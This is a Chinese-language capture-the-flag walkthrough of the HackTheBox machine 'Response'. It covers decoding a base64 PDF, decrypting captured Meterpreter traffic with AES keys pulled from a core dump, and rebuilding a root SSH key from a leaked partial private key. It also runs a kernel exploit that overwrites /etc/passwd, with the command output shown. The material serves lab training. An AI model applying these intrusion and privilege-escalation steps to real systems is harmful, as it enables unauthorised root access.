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iago3Mjg1CmVuZG9iagozNCAwIG9iago8PCAvVHlwZSAvRm9udAovU3VidHlwZSAvQ0lERm9udFR5cGUyCi9CYXNlRm9udCAvRGVqYVZ1U2Fucy1Cb2xkCi9DSURTeXN0ZW1JbmZvIDw8IC9SZWdpc3RyeSAoQWRvYmUpIC9PcmRlcmluZyAoSWRlbnRpdHkpIC9TdXBwbGVtZW50IDAgPj4KL0ZvbnREZXNjcmlwdG9yIDMyIDAgUgovQ0lEVG9HSURNYXAgL0lkZW50aXR5Ci9XIFswIFs2MDAgNzcwIDY3OCA1OTUgNzE2IDY4NyA3MTIgMzQ4IDcyMCA1OTMgNjc1IDM0MyA3MTYgNjgzIDQ5MyA0NzggNDE1IDcxNiAzNzIgNjk2IDY5NiA0MDAgNjk2IDY5NiA3MTIgMTA0MiA2NTIgMzgwIDY5NiA2OTYgNjk2IDQ1NyAzNDMgNDU3IDc3NCA3MzMgNjUyIDc3NCA2NDUgNDM1IDk5NSBdCl0KPj4KZW5kb2JqCjM1IDAgb2JqCjw8IC9MZW5ndGggNjQ0ID4+CnN0cmVhbQovQ0lESW5pdCAvUHJvY1NldCBmaW5kcmVzb3VyY2UgYmVnaW4KMTIgZGljdCBiZWdpbgpiZWdpbmNtYXAKL0NJRFN5c3RlbUluZm8gPDwgL1JlZ2lzdHJ5IChBZG9iZSkgL09yZGVyaW5nIChVQ1MpIC9TdXBwbGVtZW50IDAgPj4gZGVmCi9DTWFwTmFtZSAvQWRvYmUtSWRlbnRpdHktVUNTIGRlZgovQ01hcFR5cGUgMiBkZWYKMSBiZWdpbmNvZGVzcGFjZXJhbmdlCjwwMDAwPiA8RkZGRj4KZW5kY29kZXNwYWNlcmFuZ2UKMiBiZWdpbmJmcmFuZ2UKPDAwMDA+IDwwMDAwPiA8MDAwMD4KPDAwMDE+IDwwMDI4PiBbPDAwNTI+IDwwMDY1PiA8MDA3Mz4gPDAwNzA+IDwwMDZGPiA8MDA2RT4gPDAwMDk+IDwwMDUzPiA8MDA2Mz4gPDAwNjE+IDwwMDY5PiA8MDA2Nz4gPDAwNDU+IDwwMDcyPiA8MDA3ND4gPDAwMkQ+IDwwMDY0PiA8MDA0QT4gPDAwMzI+IDwwMDMxPiA8MDAzQT4gPDAwMzM+IDwwMDMwPiA8MDA3NT4gPDAwNkQ+IDwwMDc5PiA8MDAyRT4gPDAwMzQ+IDwwMDM3PiA8MDAzOD4gPDAwMjg+IDwwMDZDPiA8MDAyOT4gPDAwNDE+IDwwMDUwPiA8MDA3Nj4gPDAwNTY+IDwwMDc4PiA8MDA2Nj4gPDAwNEQ+IF0KZW5kYmZyYW5nZQplbmRjbWFwCkNNYXBOYW1lIGN1cnJlbnRkaWN0IC9DTWFwIGRlZmluZXJlc291cmNlIHBvcAplbmQKZW5kCgplbmRzdHJlYW0KZW5kb2JqCjcgMCBvYmoKPDwgL1R5cGUgL0ZvbnQKL1N1YnR5cGUgL1R5cGUwCi9CYXNlRm9udCAvRGVqYVZ1U2Fucy1Cb2xkCi9FbmNvZGluZyAvSWRlbnRpdHktSAovRGVzY2VuZGFudEZvbnRzIFszNCAwIFJdCi9Ub1VuaWNvZGUgMzUgMCBSPj4KZW5kb2JqCjM2IDAgb2JqCjw8Ci9MZW5ndGggNgo+PgpzdHJlYW0K//////+ACmVuZHN0cmVhbQplbmRvYmoKMyAwIG9iago8PAovVHlwZSAvUGFnZXMKL0tpZHMgClsKNiAwIFIKMTQgMCBSCl0KL0NvdW50IDIKL1Byb2NTZXQgWy9QREYgL1RleHQgL0ltYWdlQiAvSW1hZ2VDXQo+PgplbmRvYmoKeHJlZgowIDM4CjAwMDAwMDAwMDAgNjU1MzUgZiAKMDAwMDAwMDAxNSAwMDAwMCBuIAowMDAwMDAwMTYzIDAwMDAwIG4gCjAwMDAwNDE2MjggMDAwMDAgbiAKMDAwMDAwMDIxMiAwMDAwMCBuIAowMDAwMDAwMzA3IDAwMDAwIG4gCjAwMDAwMDAzNDQgMDAwMDAgbiAKMDAwMDA0MTQzMSAwMDAwMCBuIAowMDAwMDMyNDg0IDAwMDAwIG4gCjAwMDAwMjMxMjYgMDAwMDAgbiAKMDAwMDAwMDY4NSAwMDAwMCBuIAowMDAwMDExMzkyIDAwMDAwIG4gCjAwMDAwMDA0NzkgMDAwMDAgbiAKMDAwMDAwMDY2NSAwMDAwMCBuIAowMDAwMDExNjE4IDAwMDAwIG4gCjAwMDAwMTE0MTQgMDAwMDAgbiAKMDAwMDAxMTk2NyAwMDAwMCBuIAowMDAwMDEzMjA0IDAwMDAwIG4gCjAwMDAwMTE3NTQgMDAwMDAgbiAKMDAwMDAxMTk0MCAwMDAwMCBuIAowMDAwMDEzMjI1IDAwMDAwIG4gCjAwMDAwMTM1MDQgMDAwMDAgbiAKMDAwMDAyMTk5NSAwMDAwMCBuIAowMDAwMDIyMjA2IDAwMDAwIG4gCjAwMDAwMjMyNjYgMDAwMDAgbiAKMDAwMDAyMTk3NCAwMDAwMCBuIAowMDAwMDIzMzI3IDAwMDAwIG4gCjAwMDAwMjM2MDIgMDAwMDAgbiAKMDAwMDAzMTMwNCAwMDAwMCBuIAowMDAwMDMxNzE4IDAwMDAwIG4gCjAwMDAwMzI2MjAgMDAwMDAgbiAKMDAwMDAzMTI4MyAwMDAwMCBuIAowMDAwMDMyNjc3IDAwMDAwIG4gCjAwMDAwMzI5NTcgMDAwMDAgbiAKMDAwMDA0MDM1NSAwMDAwMCBuIAowMDAwMDQwNzM1IDAwMDAwIG4gCjAwMDAwNDE1NzIgMDAwMDAgbiAKMDAwMDA0MDMzNCAwMDAwMCBuIAp0cmFpbGVyCjw8Ci9TaXplIDM4IAovSW5mbyAxIDAgUgovUm9vdCAyIDAgUgo+PgpzdGFydHhyZWYKNDE3MzMgCiUlRU9GCg==
把上面这串玩意放到一个文件内
┌──(kali㉿kali)-[~/HTB/Response]
└─$ nano base64_pdf
┌──(kali㉿kali)-[~/HTB/Response]
└─$ cat base64_pdf | base64 -d > report.pdf
┌──(kali㉿kali)-[~/HTB/Response]
└─$ ls
base64_pdf https.py report.pdf server.crt server.csr server.key
获得了私钥
新建 id_rsa 并放入
chmod 400 id_rsa
#新建id_rsa并放入
chmod 400 id_rsa
ssh [email protected] -i id_rsa
成功🎉
┌──(kali㉿kali)-[~/HTB/Response]
└─$ ssh [email protected] -i id_rsa
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-109-generic x86_64)
scryh@response:~$
Root 权限#
法一 解析私钥#
流量分析#
scryh@response:~$ ls
incident_2022-3-042 scan
scryh@response:~$ cd incident_2022-3-042/
scryh@response:~/incident_2022-3-042$ ls
core.auto_update dump.pcap IR_report.pdf
scryh@response:~/incident_2022-3-042$
把后面两个文件下载到 kali
这份报告写了遭遇到了攻击,抓到了一些流量,meterpreter 会话在 zip 文件中
那么先分析流量
这个人和我们一样,从悲惨的 bob 下手
将二进制数据写入文件,并做逆向
with open('auto_update','wb') as file:
file.write(bytes.fromhex(""))
┌──(kali㉿kali)-[~/HTB/Response]
└─$ gdb auto_update core.auto_update
GNU gdb (Debian 12.1-4+b1) 12.1
Copyright (C) 2022 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from auto_update...
warning: Can't open file /dev/shm/auto_update during file-backed mapping note processing
warning: exec file is newer than core file.
[New LWP 2901]
[New LWP 2903]
--Type <RET> for more, q to quit, c to continue without paging--
Core was generated by `./auto_update'.
#0 0x00007f5090a77f48 in __syscall ()
[Current thread is 1 (LWP 2901)]
(gdb) thread apply all bt
Thread 2 (LWP 2903):
#0 0x00007f5090a77f48 in __syscall ()
#1 0x00007f5090a7ae24 in __timedwait_cp ()
#2 0x0000000000000000 in ?? ()
Thread 1 (LWP 2901):
#0 0x00007f5090a77f48 in __syscall ()
#1 0x00007f5090a6d432 in select ()
#2 0x0000000000000000 in ?? ()
用工具解密也行
bulk_extractor -S scan_aes_128=1 core.auto_update -o aes
┌──(kali㉿kali)-[~/HTB/Response/aes]
└─$ cat aes_keys.txt
# BANNER FILE NOT PROVIDED (-b option)
# BULK_EXTRACTOR-Version: 2.0.0
# Feature-Recorder: aes_keys
# Filename: core.auto_update
# Feature-File-Version: 1.1
1687472 f2 ... c5 AES256
解析 TCP#
- 在 wireshark 中打开 pcap
- 查找 tcp.port == 4444
- 查看会话 “跟随 TCP 流”
- 显示数据格式改为
raw - 将第一个 zip 的所有数据包复制并粘贴到文件中(45 个 TCP 流数据包)到 2571 行
- 将所有复制的文件加入一行(删除空格)
- 使用脚本 python 提取 payload
- 为第二个 zip 重复所有(4 个 TCP 流数据包)
from meterpreter_traffic_parser import *
from Crypto.Util.number import long_to_bytes
data = 0x...
aes_key = b'\xf2\x00...\xc5'
p = Packet(long_to_bytes(data), aes_key)
p.describe()
获得两个 payload
类型:TLV_META_TYPE_RAW,TLV_TYPE_CHANNEL_DATA
长度:1048584
有效负载:b'PK\x03\x04\n\x00\x00\x00\x00\x00\xb4Tn
类型:TLV_META_TYPE_RAW,TLV_TYPE_CHANNEL_DATA
长度:225970
有效负载:b'\xfa\x8a"\x15\xb3[BS\x04~\x15VV\x80\xbc!\xb7)Q<\xce\xe5\xc0y1\x19U\xbe\x94 \xd4\x1e\xd6\xd0D\x12\xb5S\xe3\xa6"a@\xfaXO\x9a\xb2V\xf4\xceb
导出两个 zip 文件
payload1 = b'PK\x03\x04\n\x00\x00\x00\x00\x00\xb4Tn....'
with open("payload.zip", "wb") as binary_file:
# Write bytes to file
binary_file.write(payload1)
payload2 = b'\xfa\x8a"\x15\xb3[BS\x04~\x15VV\x80\xbc!\xb7)Q<\xce\xe5\xc0y1\x1....'
with open("payload2.zip", "wb") as binary_file:
# Write bytes to file
binary_file.write(payload2)
获得公钥#
┌──(kali㉿kali)-[~/HTB/Response]
└─$ md5sum payload.zip payload2.zip
5cddc0623e449109bf06d9342325000d payload.zip
1976ecf8c406efd9b0cbbf2c1812b1ce payload2.zip
┌──(kali㉿kali)-[~/HTB/Response]
└─$ du -b payload.zip payload2.zip
1048576 payload.zip
225962 payload2.zip
┌──(kali㉿kali)-[~/HTB/Response]
└─$ cat payload.zip payload2.zip > document.zip
┌──(kali㉿kali)-[~/HTB/Response]
└─$ md5sum document.zip
145b31e9b794e45e3b80f6e2634e13a4 document.zip
┌──(kali㉿kali)-[~/HTB/Response]
└─$ unzip document.zip
Archive: document.zip
creating: Documents/
inflating: Documents/.tmux.conf
inflating: Documents/Screenshot from 2022-06-15 13-37-42.png
inflating: Documents/.vimrc
inflating: Documents/bookmarks_3_14_22.html
inflating: Documents/authorized_keys
解密私钥#
截图中的私钥
ntEd3KnWNpkbwp28vVgasUOq3CQBbDOQAAAMEAxwsaGXCZwMb/JH88XvGhu1Bo2zomIhaV
MrbN5x4q3c7Z0u9gmkXO+NWMpX7T20l0OBEIhrW6DQOsxis/CrS5u69F6tUZjlUdNE1zIE
7IFv2QurMwNL89/SnlQbe24xb+IjafKUaOPsNcpFakP4vxnKL+uw6qFoqRdSZyndgArZKD
K26Z7ZzdV2ln2kyiLfokN8WbYxHeQ/7/jVBXf71BU1+Xg8X44njVp3Xf9gO6cYVaqb1xBs
Z7bG8Warkycj7ZAAAADXJvb3RAcmVzcG9uc2UBAgMEBQ==
RSA 工作原理
- 找到两个不同的素数
p和q:例如p=61和q=53 - 计算模数
n=p*q:n=61*53=3233 - 计算
phi(n)=(p-1)*(q-1):phi(3233)=(61-1)*(53-1)=60*52=3120 - 找出一个
e与 互质phi(n)且1 < e < phi(n)成立的数。一个技巧是选择e质数并检查e不除数phi(n)。e=17 - 计算的模乘逆 `d
加密 / 解密消息m很简单:
- 加密:
c(m) = m ^ e mod n - 解密:
m(c) = c ^ d mod n
那么要先找出 n,之后获取 p 和 q
pip install openssh-key-parser
┌──(kali㉿kali)-[~/HTB/Response]
└─$ python -m openssh_key authorized_keys
[
{
"header": {
"key_type": "ssh-rsa"
},
"params": {
"data": {
"e": 65537,
"n": 3590773335101238071859307517426880690889840523373109884703778010764218094115323788644947218525265498470146994925454017059004091762707129955524413436586717182608324763300282675178894829982057112627295254493287098002679639669820150059440230026463333555689667464933204440020706407713635415638301509611028928080368097717646239396715845563655727381707204991971414197232171033109308942706448793290810366211969147142663590876235902557427967338347816317607468319013658232746475644358504534903127732182981965772016682335749548359468750099927184491041818321309183225976141161842377047637016333306802160159421621687348405702117650608558846929592531719185754360656942555261793483663585574756410582955655659226850666667278286719778179120315714973739946191120342805835285916572624918386794240440690417793816096752504556412306980419975786379416200263786952472798045196058762477056525870972695021604337904447201141677747670148003857478011217
}
},
"footer": {},
"clear": {
"key_type": "ssh-rsa",
"comment": "root@response"
}
}
]
这样 n,e 就有了
🧨爆破 (不推荐)
用Yafu找一下 p 和 q
.\yafu-x64.exe "factor(0x上面n的数据)"
或者自己写个 python 脚本
n = ....
for i in range(10**(463-1), 10**463):
if n % i == 0:
print("找到了!q是: ", i)
break
else:
print("找不到")
🗺解密 (👍推荐)
通过 base64 解码剩余的私钥
注意是 6 位编码
00c70b1a197099c0c6ff247f3c5ef1a1bb5068db3a2622169532b6cde71e2addced9d2ef609a45cef8d58ca57ed3db497438110886b5ba0d03acc62b3f0ab4b9bbaf45ead5198e551d344d73204ec816fd90bab33034bf3dfd29e541b7b6e316fe22369f29468e3ec35ca456a43f8bf19ca2febb0eaa168a917526729dd800ad92832b6e99ed9cdd576967da4ca22dfa2437c59b6311de43feff8d50577fbd41535f9783c5f8e278d5a775dff603ba71855aa9bd7106c67b6c6f166ab932723ed9
将获得的 16 进制转换成 10 进制就是我们要得到的 q 了
1874049613140184843621060844430875438039715136676390587014490642667648348834729578670572218770675017671955165909510372680231227997794797813783251855034499318060383466632797554895089403256742241869718483308458055165937168105025970618417112700682332538743333548471395327848077917895144087346832755607400573406688527717696386155103840198329730569043884613339720346942456798464865298511514240849350597034988561850631574781811925376637626743947768533920575522310602457
那么 p = n //q 就可以算出了
pip install pyasn1==0.4.5
用一个工具包 rsatool
┌──(kali㉿kali)-[~/HTB/Response/破解私钥]
└─$ python rsatool.py -f PEM -o private.pem -p 得出的结果 -q 得出的结果 -e 65537 -n 3590773335101238071859307517426880690889840523373109884703778010764218094115323788644947218525265498470146994925454017059004091762707129955524413436586717182608324763300282675178894829982057112627295254493287098002679639669820150059440230026463333555689667464933204440020706407713635415638301509611028928080368097717646239396715845563655727381707204991971414197232171033109308942706448793290810366211969147142663590876235902557427967338347816317607468319013658232746475644358504534903127732182981965772016682335749548359468750099927184491041818321309183225976141161842377047637016333306802160159421621687348405702117650608558846929592531719185754360656942555261793483663585574756410582955655659226850666667278286719778179120315714973739946191120342805835285916572624918386794240440690417793816096752504556412306980419975786379416200263786952472798045196058762477056525870972695021604337904447201141677747670148003857478011217
没什么问题就连上试试看
┌──(kali㉿kali)-[~/HTB/Response/破解私钥]
└─$ chmod 400 private.pem
┌──(kali㉿kali)-[~/HTB/Response/破解私钥]
└─$ ssh [email protected] -i private.pem
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-109-generic x86_64)
root@response:~# whoami
root
root@response:~# ls
docker docs_backup.zip ldap root.txt snap
root@response:~#
法二 CVE 漏洞利用#
Github Repo not found
The embedded github repo could not be found…
scryh@response:~$ chmod +x exp_file_credential
scryh@response:~$ ./exp_file_credential
self path /home/scryh/./exp_file_credential
prepare done
Old limits -> soft limit= 14096 hard limit= 14096
starting exploit, num of cores: 2
defrag done
spray 256 done
freed the filter object
256 freed done
double free done
spraying files
found overlap, id : 126, 134
start slow write
closed overlap
got cmd, start spraying /etc/passwd
write done, spent 2.834875 s
should be after the slow write
spray done
succeed
scryh@response:~$ head -n 4 /etc/passwd
user:$1$user$k8sntSoh7jhsc6lwspjsU.:0:0:/root/root:/bin/bash
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
scryh@response:~$ su user
Password: k8sntSoh7jhsc6lwspjsU.
# whoami
user
# cat /root/root.txt
4*****************************3
#